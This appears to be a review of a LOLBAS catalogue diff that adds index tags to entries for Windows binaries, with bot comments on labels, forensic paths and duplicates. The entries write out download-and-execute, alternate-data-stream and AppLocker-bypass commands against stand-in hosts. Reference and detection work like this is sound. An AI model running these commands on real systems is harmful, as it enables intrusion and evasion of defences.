- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml
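Review bot: `- Execute: WSH` may be the wrong label for this wmic entry: both Detection references in the hunk are about XSL script processing (`image_load_wmic_remote_xsl_scripting_dlls`, `proc_creation_win_wmic_xsl_script_processing`), which is script embedded in a stylesheet rather than a Windows Script Host invocation. If the tag scheme is meant to capture the input format, something like `Input: XSL` would match the detections better; if `WSH` is intended to mean "any script engine", that meaning should be written down in the tag documentation.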

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1564.004 MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
- Command: echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js - Command: echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js
Description: Download and execute script stored in an alternate data stream Description: Download and execute script stored in an alternate data stream
Usecase: Execute hidden code to evade defensive counter measures Usecase: Execute hidden code to evade defensive counter measures
@ -21,8 +23,6 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Windows\System32\wscript.exe - Path: C:\Windows\System32\wscript.exe
- Path: C:\Windows\SysWOW64\wscript.exe - Path: C:\Windows\SysWOW64\wscript.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml

View File

@ -5,16 +5,16 @@ Author: 'David Middlehurst'
Created: 2020-09-23 Created: 2020-09-23
Commands: Commands:
- Command: wuauclt.exe /UpdateDeploymentProvider Full_Path_To_DLL /RunHandlerComServer - Command: wuauclt.exe /UpdateDeploymentProvider Full_Path_To_DLL /RunHandlerComServer
Description: Full_Path_To_DLL would be the abosolute path to .DLL file and would execute code on attach. Description: Full_Path_To_DLL would be the absolute path to .DLL file and would execute code on attach.
Usecase: Execute dll via attach/detach methods Usecase: Execute dll via attach/detach methods
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\Windows\System32\wuauclt.exe - Path: C:\Windows\System32\wuauclt.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_wuauclt.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_wuauclt.yml

View File

@ -19,12 +19,14 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache.
Usecase: Download file from Internet Usecase: Download file from Internet
Category: Download Category: Download
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path: Full_Path:
- Path: C:\Windows\System32\xwizard.exe - Path: C:\Windows\System32\xwizard.exe
- Path: C:\Windows\SysWOW64\xwizard.exe - Path: C:\Windows\SysWOW64\xwizard.exe
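Review bot: The Description rewrite on the `xwizard RunWizard ... /z` entry throws away the most useful forensic detail in this file: the old text gave the full drop pattern `%LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>` (and the `\IE\` variant), including the `[1]` suffix that distinguishes the cached copy. "save it to INetCache" plus `- Download: INetCache` does not let a responder reconstruct that. Suggest restoring the path pattern in the Description and keeping the tag purely as an index key.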

View File

@ -18,6 +18,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Input: INF
- Command: rundll32.exe advpack.dll,RegisterOCX test.dll - Command: rundll32.exe advpack.dll,RegisterOCX test.dll
Description: Launch a DLL payload by calling the RegisterOCX function. Description: Launch a DLL payload by calling the RegisterOCX function.
Usecase: Load a DLL payload. Usecase: Load a DLL payload.
@ -25,6 +27,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: rundll32.exe advpack.dll,RegisterOCX calc.exe - Command: rundll32.exe advpack.dll,RegisterOCX calc.exe
Description: Launch an executable by calling the RegisterOCX function. Description: Launch an executable by calling the RegisterOCX function.
Usecase: Run an executable payload. Usecase: Run an executable payload.
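Review bot: The `Execute: DLL` block here belongs to the `advpack.dll,RegisterOCX test.dll` entry, which is correct, but the `RegisterOCX calc.exe` entry on the next line launches an executable rather than loading a DLL, so its tags (outside this hunk) should not be `Execute: DLL` if they were filled in by copy-paste. The same applies to the matching ieadvpack.dll entries.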

View File

@ -25,6 +25,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe
Description: Launch an executable by calling the RegisterOCX function. Description: Launch an executable by calling the RegisterOCX function.
Usecase: Run an executable payload. Usecase: Run an executable payload.

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path: Full_Path:
- Path: c:\windows\system32\scrobj.dll - Path: c:\windows\system32\scrobj.dll
- Path: c:\windows\syswow64\scrobj.dll - Path: c:\windows\syswow64\scrobj.dll

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Input: INF
- Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf
Description: Launch an executable file via the InstallHinfSection function and .inf file section directive. Description: Launch an executable file via the InstallHinfSection function and .inf file section directive.
Usecase: Load an executable payload. Usecase: Load an executable payload.
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Input: INF
Full_Path: Full_Path:
- Path: c:\windows\system32\setupapi.dll - Path: c:\windows\system32\setupapi.dll
- Path: c:\windows\syswow64\setupapi.dll - Path: c:\windows\syswow64\setupapi.dll
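Review bot: Unrelated to the tag but visible in this hunk: `OperatingSystem: Windows` on the second setupapi entry lists no versions, unlike every other entry in this commit (`Windows 10, Windows 11` on the first one). Worth filling in while the file is open so the tag-based index and the OS field stay equally searchable.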

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe - Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe
Description: Launch an executable by calling the ShellExec_RunDLL function. Description: Launch an executable by calling the ShellExec_RunDLL function.
Usecase: Run an executable payload. Usecase: Run an executable payload.

View File

@ -5,12 +5,14 @@ Author: Eral4m
Created: 2021-01-06 Created: 2021-01-06
Commands: Commands:
- Command: rundll32.exe c:\Windows\System32\shimgvw.dll,ImageView_Fullscreen http://x.x.x.x/payload.exe - Command: rundll32.exe c:\Windows\System32\shimgvw.dll,ImageView_Fullscreen http://x.x.x.x/payload.exe
Description: Once executed, rundll32.exe will download the file at the URL in the command to %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\<random>\payload[1].exe. Can also be used with entrypoint 'ImageView_FullscreenA'. Description: Once executed, rundll32.exe will download the file at the URL in the command to INetCache. Can also be used with entrypoint 'ImageView_FullscreenA'.
Usecase: Download file from remote location. Usecase: Download file from remote location.
Category: Download Category: Download
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path: Full_Path:
- Path: c:\windows\system32\shimgvw.dll - Path: c:\windows\system32\shimgvw.dll
- Path: c:\windows\syswow64\shimgvw.dll - Path: c:\windows\syswow64\shimgvw.dll
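Review bot: the Description rewrite drops the concrete drop location (`%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\<random>\payload[1].exe`) in favour of the word INetCache plus a `Download: INetCache` tag. That path and the `payload[1].exe` naming pattern are precisely what a responder looks for when triaging a host, and the tag value does not carry them. Suggest keeping the full path in the Description (the tag can still summarise it); the same applies to the MsoHtmEd.exe and mspub.exe Usecase rewrites later in this diff, which also replace an explicit `%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE` path with the bare word.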

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Input: INF
- Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf
Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive. Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.
Usecase: Load an executable payload. Usecase: Load an executable payload.
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Input: INF
Full_Path: Full_Path:
- Path: c:\windows\system32\syssetup.dll - Path: c:\windows\system32\syssetup.dll
- Path: c:\windows\syswow64\syssetup.dll - Path: c:\windows\syswow64\syssetup.dll

View File

@ -21,8 +21,6 @@ Commands:
Full_Path: Full_Path:
- Path: c:\windows\system32\zipfldr.dll - Path: c:\windows\system32\zipfldr.dll
- Path: c:\windows\syswow64\zipfldr.dll - Path: c:\windows\syswow64\zipfldr.dll
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml
Resources: Resources:
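Review bot: removing the empty `Code_Sample:` / `- Code:` placeholder is cleanup unrelated to the tagging change, and the same removal recurs for appvlp.exe, bginfo.exe and winword.exe further down. Confirm the YAML schema treats Code_Sample as optional before merging (otherwise validation will fail on these files), and consider splitting the placeholder cleanup into its own commit so the history of the Tags field stays readable.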

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1216 MitreID: T1216
OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1
Code_Sample: Code_Sample:

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1216 MitreID: T1216
OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1
Code_Sample: Code_Sample:

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Execute: DLL
- Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll - Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll
Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name. Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.
Usecase: Local execution of managed code to bypass AppLocker. Usecase: Local execution of managed code to bypass AppLocker.
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe

View File

@ -28,8 +28,6 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe - Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe
- Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe - Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_appvlp.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_appvlp.yml
Resources: Resources:

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Execute: WSH
- Command: bginfo.exe bginfo.bgi /popup /nolicprompt - Command: bginfo.exe bginfo.bgi /popup /nolicprompt
Description: Execute VBscript code that is referenced within the bginfo.bgi file. Description: Execute VBscript code that is referenced within the bginfo.bgi file.
Usecase: Local execution of VBScript Usecase: Local execution of VBScript
@ -18,12 +20,16 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Execute: WSH
- Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt - Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
Usecase: Remote execution of VBScript Usecase: Remote execution of VBScript
Description: Execute bginfo.exe from a WebDAV server. Description: Execute bginfo.exe from a WebDAV server.
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
Tags:
- Execute: WSH
OperatingSystem: Windows OperatingSystem: Windows
- Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt - Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
Usecase: Remote execution of VBScript Usecase: Remote execution of VBScript
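Review bot: in this hunk the third command's Tags block is inserted between `MitreID: T1218` and `OperatingSystem: Windows`, whereas every other entry in this diff places Tags after OperatingSystem. Move it below OperatingSystem so the entry stays consistent with the rest of the file and with the other files touched here. Separately, the `\\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt` command with Usecase `Remote execution of VBScript` now appears twice in a row in this file; worth checking whether the second copy is an accidental duplicate while the file is being edited.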
@ -32,6 +38,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Execute: WSH
- Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt - Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
Usecase: Remote execution of VBScript Usecase: Remote execution of VBScript
Description: This style of execution may not longer work due to patch. Description: This style of execution may not longer work due to patch.
@ -39,6 +47,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Execute: WSH
- Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt - Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
Usecase: Remote execution of VBScript Usecase: Remote execution of VBScript
Description: This style of execution may not longer work due to patch. Description: This style of execution may not longer work due to patch.
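Review bot: this hunk tags an entry whose Command, Usecase and Description are identical to the entry in the previous hunk (`\\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt`, `Description: This style of execution may not longer work due to patch.`). Since both are being touched anyway, check whether one of them is a duplicate, and fix the wording to "may no longer work due to a patch" in whichever copy stays.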
@ -46,10 +56,10 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Execute: WSH
Full_Path: Full_Path:
- Path: No fixed path - Path: No fixed path
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1055 MitreID: T1055
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Execute: DLL
- Command: coregen.exe dummy_assembly_name - Command: coregen.exe dummy_assembly_name
Description: Loads the coreclr.dll in the corgen.exe directory (e.g. C:\Program Files\Microsoft Silverlight\5.1.50918.0). Description: Loads the coreclr.dll in the corgen.exe directory (e.g. C:\Program Files\Microsoft Silverlight\5.1.50918.0).
Usecase: Execute DLL code Usecase: Execute DLL code
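Review bot: the context line `Description: Loads the coreclr.dll in the corgen.exe directory` misspells the binary as corgen.exe (the file and Full_Path say coregen.exe). Not introduced by this change, but since the file is being edited the typo could be fixed in the same pass.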
@ -25,6 +27,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\Program Files\Microsoft Silverlight\5.1.50918.0\coregen.exe - Path: C:\Program Files\Microsoft Silverlight\5.1.50918.0\coregen.exe
- Path: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe - Path: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe
@ -42,8 +46,5 @@ Resources:
- Link: https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html - Link: https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html
Acknowledgement: Acknowledgement:
- Person: Nicky Tyrer - Person: Nicky Tyrer
Handle:
- Person: Evan Pena - Person: Evan Pena
Handle:
- Person: Casey Erikson - Person: Casey Erikson
Handle:
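Review bot: dropping the empty `Handle:` keys under Acknowledgement is unrelated to the tagging work. Confirm the schema does not require Handle for each Person (an empty key and an absent key validate differently under a strict schema), and mention the cleanup in the commit message so reviewers of the history know the diff is not tag-only.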

View File

@ -6,11 +6,13 @@ Created: 2019-07-19
Commands: Commands:
- Command: Excel.exe http://192.168.1.10/TeamsAddinLoader.dll - Command: Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
Description: Downloads payload from remote server Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in the cache folder Usecase: It will download a remote payload and place it in INetCache.
Category: Download Category: Download
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Download: INetCache
Full_Path: Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Excel.exe - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Excel.exe

View File

@ -6,11 +6,13 @@ Created: 2022-07-24
Commands: Commands:
- Command: MsoHtmEd.exe https://example.com/payload - Command: MsoHtmEd.exe https://example.com/payload
Description: Downloads payload from remote server Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) Usecase: It will download a remote payload and place it in INetCache.
Category: Download Category: Download
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path: Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSOHTMED.exe - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSOHTMED.exe
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSOHTMED.exe - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSOHTMED.exe

View File

@ -6,11 +6,13 @@ Created: 2022-08-02
Commands: Commands:
- Command: mspub.exe https://example.com/payload - Command: mspub.exe https://example.com/payload
Description: Downloads payload from remote server Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) Usecase: It will download a remote payload and place it in INetCache.
Category: Download Category: Download
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path: Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSPUB.exe - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSPUB.exe
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSPUB.exe - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSPUB.exe

View File

@ -6,11 +6,13 @@ Created: 2019-07-19
Commands: Commands:
- Command: Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll" - Command: Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"
Description: Downloads payload from remote server Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in the cache folder Usecase: It will download a remote payload and place it in INetCache.
Category: Download Category: Download
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Download: INetCache
Full_Path: Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Powerpnt.exe - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Powerpnt.exe
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Powerpnt.exe - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Powerpnt.exe

View File

@ -12,14 +12,18 @@ Commands:
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher
Tags:
- Execute: DLL
- Command: procdump.exe -md calc.dll foobar - Command: procdump.exe -md calc.dll foobar
Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary. Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary.
Usecase: Performs execution of unsigned DLL. Usecase: Performs execution of unsigned DLL.
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: no default - Path: no default
Detection: Detection:
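Review bot: besides adding the tags, this hunk also strips the trailing full stop from both `OperatingSystem:` values (`Windows 8.1 and higher, Windows Server 2012 and higher.`). That is a reasonable normalisation, but it is a wording change unrelated to Tags; either leave it out or call it out in the commit so the diff is not read as tag-only.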

View File

@ -18,6 +18,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Execute: DLL
- Input: Custom Format
Full_Path: Full_Path:
- Path: no default - Path: no default
Detection: Detection:
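Review bot: `- Input: Custom Format` is the first tag value in this diff containing a space, alongside single-token values such as `INF`, `DLL`, `WSH` and `INetCache`. The key:value form is fine for YAML, but nothing in the diff pins down the allowed keys (Execute, Input, Download) or their values, so contributors are likely to drift (Dll vs DLL, "Custom format" vs "Custom Format"), which would fragment any site filtering built on these tags. Suggest listing the accepted tag keys and values in the contribution template and, if the schema permits it, constraining the values there as well.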

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Execute: DLL
- Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe - Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions. Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.
Usecase: Injection of locally stored DLL file into target process. Usecase: Injection of locally stored DLL file into target process.
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: no default - Path: no default
Code_Sample: Code_Sample:

View File

@ -6,11 +6,13 @@ Created: 2019-07-19
Commands: Commands:
- Command: winword.exe "http://192.168.1.10/TeamsAddinLoader.dll" - Command: winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
Description: Downloads payload from remote server Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in the cache folder Usecase: It will download a remote payload and place it in INetCache.
Category: Download Category: Download
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
